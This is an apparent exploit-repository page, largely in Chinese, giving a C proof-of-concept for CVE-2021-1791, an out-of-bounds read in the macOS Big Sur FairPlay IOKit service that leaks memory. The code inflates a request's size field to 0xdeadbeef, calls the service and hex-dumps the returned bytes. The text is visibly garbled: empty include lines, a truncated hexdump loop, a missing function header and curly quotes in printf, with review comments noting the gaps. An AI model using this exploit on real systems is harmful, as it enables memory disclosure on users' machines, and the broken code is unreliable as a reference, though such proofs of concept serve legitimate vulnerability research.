# CVE-2021-1791 Fairplay OOB Read POC
越界读取问题，导致内存信息泄露。
影响版本:macOS Big Sur 11.0.1
fairplay_iokit_uc_run_versioned.c:
```c
#include
#include
#include
#include
#include
#include
void hexdump(void *ptr, int buflen) {
unsigned char *buf = (unsigned char*)ptr;
int i, j;
for (i=0; i
// NOTE(review): the enclosing function's signature, the struct definitions
// behind sIn/sOut, and the body of hexdump() were lost in extraction; only
// the tail of the function is visible from here. The curly quotes inside the
// printf format strings below are presumably an extraction artifact too.
// Populate the request: two fixed words, then a length that matches the
// 0x70 bytes about to be copied into sec2 (field meanings are not on this page).
sIn->field_4 = 0x525e5ba4;
sIn->field_8 = 0x34788a7a;
sIn->size = 0x70;
memcpy(sIn->sec1,sec1,20);
memcpy(sIn->sec2,sec2,sIn->size);
//magic
// After the payload is in place the length field is overwritten with a value
// far larger than the 0x70 bytes actually copied. This mismatch between the
// declared length and the real data is presumably the out-of-bounds read the
// page describes; the service-side handling of `size` is not on this page.
// The defensive fix on the receiving side is to validate `size` against the
// buffer it indexes before using it.
sIn->size = 0xdeadbeef;
// A non-zero return from the wrapper is treated as failure; the wrapper is
// presumably defined earlier in this file.
if(fairplay_run_versioned(conn,sIn,sOut)){
return -1;
}
printf(“outSec1 : \n”);
hexdump(sOut->sec1,20);
printf(“outSec2 : \n”);
// The dump length is whatever the service returned in sOut->size. If that
// value echoes the inflated request length, hexdump() reads past sOut->sec2
// in this process as well — TODO confirm sOut->sec2 is sized for the largest
// `size` the service can return, or clamp it before dumping.
hexdump(sOut->sec2,sOut->size);
printf(“[+] fairplay success, size = %d, ret = %d\n”,sOut->size,sOut->fp_ret);
}
```
ref:
* https://support.apple.com/en-us/HT212147
* https://gist.github.com/pwn0rz/e34ab9f6e46956621a9d4f98cf222320